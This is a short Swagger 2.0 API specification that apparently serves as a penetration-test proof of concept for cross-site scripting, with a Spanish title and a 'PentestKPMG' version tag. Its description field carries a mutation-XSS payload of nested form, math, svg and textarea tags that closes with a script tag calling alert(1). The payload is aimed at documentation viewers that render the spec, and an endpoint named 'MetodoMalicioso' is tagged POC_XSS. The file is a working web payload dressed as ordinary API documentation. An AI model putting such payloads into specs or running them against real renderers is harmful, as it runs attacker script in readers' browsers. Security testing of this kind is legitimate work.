swagger: '2.0'
info:
  title: Prueba de Concepto - Cross-Site Scripting
  description: |
    <form><math><mtext></form><form><mglyph><svg><mtext><textarea><path id="</textarea><script>alert(1)</script></form>
  version: PentestKPMG
basePath: /JSSResource/
produces:
  - application/xml
  - application/json
consumes:
  - application/xml
  - application/json
security:
  - basicAuth: []
paths:
  /MetodoMalicioso:
    get:
      responses:
        '200':
          description: No response was specified
      tags:
        - POC_XSS
      operationId: findAccounts
      summary: Finds all accounts
  /AutorizacionesV1:
    get:
      responses:
        '200':
          description: No response was specified
      tags:
        - /api/AutorizacionesV1/{IdDeDespacho}
      operationId: findAccounts
      summary: Finds all accounts
